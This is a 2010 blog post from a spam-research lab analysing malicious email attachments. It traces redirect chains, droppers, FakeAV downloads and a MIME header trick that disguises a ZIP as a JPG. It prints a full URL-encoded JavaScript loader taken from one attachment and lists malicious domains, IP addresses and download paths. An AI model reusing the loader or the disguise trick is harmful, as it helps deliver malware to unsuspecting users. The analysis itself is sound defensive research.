Thursday, September 16, 2010

Linking Spam by its Attachments

Today some anti-spam friends were chatting about a new rash of "attachment spam" and wondering what attachments "belonged together" and what they did. Sounded like the perfect question for the UAB Spam Data Mine, so I thought I'd take a peek.

The first thing I did was to look for email subjects that had non-graphics-file attachments where we had received at least 250 copies of the email message today.

It wasn't actually that long of a list:

Apartment for rentApplication to rent.html
B street financial information - part 1B St.Package 1.html
Bar/BriSummaries.RBK.zip
Church of Body ModificationChurch of Body Modification.html
Cops kill active shooter at Johns Hopkins HospitalHospital violence on the rise, agency warns.html
Corrections.htmlCorrections.html
Corrections.zipCorrections.zip
Daniel Covington dieDaniel Covington.html
detailsShadow Ranch Marketing Package.zip
Employment letter for visa applicationjun wang letter.html
Evite invitation from (Random Name)Evite invitation.html
Evite invitation from (Random Name)Evite invitation.zip
Facebook password has been changedNew_password.zip
find a copy of the lettercopy of the letter.html
FW:September financials and newsletterSeptember 2010.html
Invoice for Floor ReplacementInvoice-Stockton.html
Invoice Payment ConfirmationInvoice Payment Confirmation.html
Jackie Evancho and Sarah BrightmanJackie Evancho and Sarah Brightman.html
League proposal.html
Marketing Package.htmlMarketing Package.html
NFL Picks Week 2NFL Picks Week 2.html
Order confirmation for order #(Random number)invoice.html
Shipping NotificationShipping Notification.html
You've got a faxeFAX(RandomNumber)DOC.zip


Then I looked to see which of the email attachments were actually the same attachment. That's actually pretty easy for us, since we store the attachments by name, with an MD5 value prepended to the name, such as:

34eaf3d214f1ef58b56d58de5e5e25b6_Invoice Payment Confirmation.html

Group One: MD5 = 136e771425e841bda5fabec0c81df974 - dark-pangolin.com



For the Attachment with an MD5 value of:

136e771425e841bda5fabec0c81df974

We saw all of the following subjects:

'America's Got Talent' Judges Were They Shocked By.html
Application to rent.html
B St. Package 1.html
Church of Body Modification.html
copy of the letter.html
Daniel Covington.html
Hospital violence on the rise, agency warns.html
Invoice-Stockton.html
Jackie Evancho and Sarah Brightman.html
jun wang letter.html
NFL Picks Week 2.html
September 2010.html

So, it would be pretty safe to assume those were all "the same."

That is a block of javascript that starts by doing a document.write with the following block of ASCII letters "unescaped":

%3C%53%43%52%49%50%54%20%4C%41%4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70%5F%64%30%31%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B%29%72%65%74%75%72%6E%3B%76%61%72%20%6F%3D%22%22%2C%61%72%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6F%73%3D%22%22%2C%69%63%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%32%3B%6F%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%6F%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%61%72%5B%69%63%2B%2B%5D%3D%6F%73%3B%6F%73%3D%22%22%7D%7D%6F%3D%61%72%2E%6A%6F%69%6E%28%22%22%29%2B%6F%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%6F%29%7D%2F%2F%2D%2D%3E%3C%2F%53%43%52%49%50%54%3E

Which is some Javascript code that looks like this:

hp_ok=true;function hp_d01(s){if(!hp_ok)return;var o="",ar=new Array(),os="",ic=0;for(i=0;i gt s.length;i++){c=s.charCodeAt(i);if(c lt 128)c=c^2;os+=String.fromCharCode(c);

and some more stuff I won't list here . . .

All of that mess ends up doing this:

First, you go to this webpage:

dark-pangolin.com/x.html on the IP address 82.165.215.9

That page told my browser:

PLEASE WAITING.... 4 SECONDS

Then did a "Meta Refresh" which sent me to:

http://scaner-enter.cz.cc/scanner15/?afid=24 on 91.197.130.109.

while at the same time loading an IFRAME which took me here:

formyjobduty.com/3/index.php on IP address 91.213.174.221

That site dropped a 15kb file on my machine.


The IP 91.197.130.109 also hosts the sites:

scaner-end.cz.cc
scaner-e.cz.cc
scaner-eee.cz.cc
scaner-demon.cz.cc
scaner-do.cz.cc
scaner-cio.cz.cc
scaner-dro.cz.cc
scaner-ear.cz.cc
hornvimawar.cz.cc
scaner-enter.cz.cc
scaner-dir.cz.cc
scaner-clouds.cz.cc
ilmemenlens.cz.cc
scaner-eclips.cz.cc
scaner-coast.cz.cc
hycormofy.cz.cc
xxxvideo-dpiy.cz.cc

".cz.cc" is a free domain provider that the criminals are abusing like crazy right now.

Other domain names located on 91.213.174.221 include:

mypetitebusiness.org
mylittlejobsite.com
workgroupsite.com
keybussines.com
formyjobduty.com
littlebiz.us

All of those except "keybussines.com" use Yahoo nameservers.



Group Two: MD5 = 34eaf3d214f1ef58b56d58de5e5e25b6 - personago.ru



For MD5:

34eaf3d214f1ef58b56d58de5e5e25b6

We saw all of the following subjects:
Corrections.html
Evite invitation.html
invoice.html
Invoice Payment Confirmation.html
proposal.html
Shipping Notification.html

This group's attachment is also a BASE64 encoded html file.

If a user simply clicks the attachment, it SEEMS to take us to a Canadian Pharmacy website of the GlavMed variety:

http://personago.ru/

But unfortunately, a deeper analysis of the code shows it takes the long way around. First the site sends us to:

clicksmile.org/x92s/uc12vx04/xdtldil.php?id=350 on IP address 91.188.59.220 in Latvia

Then it sends us on to "personago.ru" on 113.107.104.23 in China's Guangdong province.

The ZIP Files: Group One - fastlouprim.com



Even though there are many different MD5s of the ".zip" file, quite a few of them are so similar in function, they are clearly "the same" despite different MD5s.

The first of the ".zip" emails has the subject: "Bar/Bri"

The body of the email reads:
Hello,

Thank you for ordering from Capcom Entertainment, Inc. on September 15, 2010. The following email is a summary of your order. Please use this as your proof of purchase. If you paid by credit card, please look for attached invoice.
Confidential & Privileged

Unless otherwise indicated or obvious from its nature, the information contained in this communication is attorney-client privileged and confidential information/work product. This communication is intended for the use of the individual or entity named above. If the reader of this communication is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error or are not sure whether it is privileged, please immediately notify us by return e-mail and destroy any copies--electronic, paper or otherwise--which you may have of this communication.


Attachment:
Summaries.RBK.zip used the MD5:
4b3e7c54e263363b7dcec53bd9e1c135

25 of 43 detection at VirusTotal - mostly called "FraudLoad" or "ZBot".

When we launched this malware, it connected to several servers in rapid order:

- www.searchannoying.com
- fastlouprim.com
- searchanxious.com
- searchbent.org
- analyticsdead.com

and downloaded a 471kb file from fastlouprim.com. That file was my FakeAV present. It stored in my current user's "Local Settings\Temp" directory as "dfrgsnapnt.exe"



VirusTotal FakeAV Report (20 of 43 detects)

A backup version was also running as "wscvc32.exe" from the same location.




The second ".zip" email had the Subject "details" and contained this email body:



Hello,



As with all bank owned assets there is a strong desire to sell. The Lender is anticipating a sale before year end and they have encouraged us to bring them qualified offers to purchase.

I will contact you shortly to discuss in detail.

Regards,

RB


Attachment:
Shadow Ranch Marketing Package.zip used the MD5:

7f51b49e92a1640250746ad3a4f11c36

24 of 43 detects at VirusTotal, mostly "FraudLoad" and ZBot.

The behavior of this malware was identical to the first - using the same domain names, fetching the same FakeAV from the same server, and installing it using the same name.




The third ".zip" email had the Subject: Shipping Notification

The body of the email read:
Shipping Notification Thank you for shopping with us. We look forward to serving you again.

The following is your receipt. Please retain a copy for your records.

Qty Item no Description Price S&H Tax Return
Code
1 FC864-2038B Msg Drma7303 White 650.99 6.95 3.37 ____


Merchandise total 650.99
Shipping and handling 6.95
Tax on mdse 6.75% 3.37
Invoice total 706.31

Welcome to the convenience of shopping JCPenney Catalog


Attachment:
Shipping Notification.zip used the MD5s:

1ee31a4fae6e9bbceb47f0bf3ea79c6f
218adbd9f6abb8f0b7fd73765e62d005

Summaries.RBK.zip behaved just like the first two entries on this list, in that it began by visiting www.searchannoying.com, fastlouprim.com, searchbent.com, analitycsdead.com, finderwid.org, and downloaded the same Fake AV from the same location.

The first has 24 of 43 detects at VirusTotal, mostly Fraudload, FakeAV, and ZBot.

The second has 26 of 43 detects at VirusTotal, mostly ZBot.




The fourth ".zip" email had the subject: Corrections.zip

The body of the email was very simple, with a Random Name in the body that matched the "From" name:
============================================================ Corrections.zip
============================================================ Jed Keller



Corrections.zip used the MD5s:

aa32b48a854b62b5a71c4a4b6f53b3a7
b268064ed27f3d3e07e410f694499b04

The first has 21 of 43 detects at VirusTotal called FraudLoad, Alureon, FakeAV, or ZBot.

The second has 26 of 43 detects at VirusTotal called ZBot or Outbreak.

"Corrections" also behaved exactly like those above. Dropping a FakeAV after contacting fastlouprim.com and the others.

The ZIP Files: Group 2 = MoneyMader.ru




The sixth ".zip" email uses the subject: Facebook password has been changed

The body of the email contains:
Dear user of facebook.

Because of the measures taken to provide safety to our clients, your password has been changed.

Important Message!
You can find your new password in attached document.

Thank you.
Facebook Team.


Attachment:
New_password.zip used the MD5:
843d5efc64e2338206f3736a2a876c45

This one is ESPECIALLY TRICKY, because the filename is hidden from the user! The email contains this code:

Content-Type: application/zip;
name="New_password.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="denno.jpg"

Which makes the attachment, which is actually called "New_password.zip" show up as a ".jpg" file, like this:



22 of 42 detects at VirusTotal mostly called BredoLab or Sasfis.

Launching "New_password" generated lots of quick webtraffic, starting with connections to "moneymader.ru" on IP 109.196.134.44, from which I did this get:

/group/mixer/bb.php?v=200&id=912648491&b=16&sentab&tm=100

I have no idea what that means, but it feels familiar -- for instance, compare with the URL Dancho talked about back in May with some itunes spam.

It also fetched from the unlikely named machine:

0006385484.dc5ccd77.01.94c71046BC3647f49cf44b7e9b4b3544.n.empty.725.empty.5_1._t_i.ffffffff.svchost_exe.165.rc2.a4h9uploading.com

which has the IP address 95.211.131.67

Then we downloaded the file "/milk/dogpod.exe" from 91.204.48.46


I also did a crazy long fetch that began with "/get2.php?c=ALOVLEKD" from the host 061707da092d.bourgum.com

When I did fetches like that, I downloaded "7.tmp" and "8.tmp" which VirusTotal calls bad:

7.tmp VirusTotal report showed it had not been reported before. It called it mostly "Kazy" or "Oficla" and gave a 17 of 43 report.
18 of 43 detection for 8.tmp
It also fetched from "y6pb.huntfeed.com" before loading some BBC News.




The last ".zip" email has the subject line You've got a fax

The body has a nice graphic and reads "The Fax message is attached to this email!"

The attachment has random numbers in the name, such as "eFAX07391DOC.zip":

eFAX(randomnumbers)DOC.zip used the MD5:
ce8a5f487daaf7a37aa6d2526b2b57d7

19 of 39 detects at VirusTotal mostly called ZBot, Oficla, or Sasfis.

When we launched this file, which was 22kb in size, it connected to "moneymader.ru" just like the "Facebook New Password" one above. I noticed when I launched this time that I sent back a 15 ?minute? delay statement to the server. I'll wait to see what happens.

No comments:

Post a Comment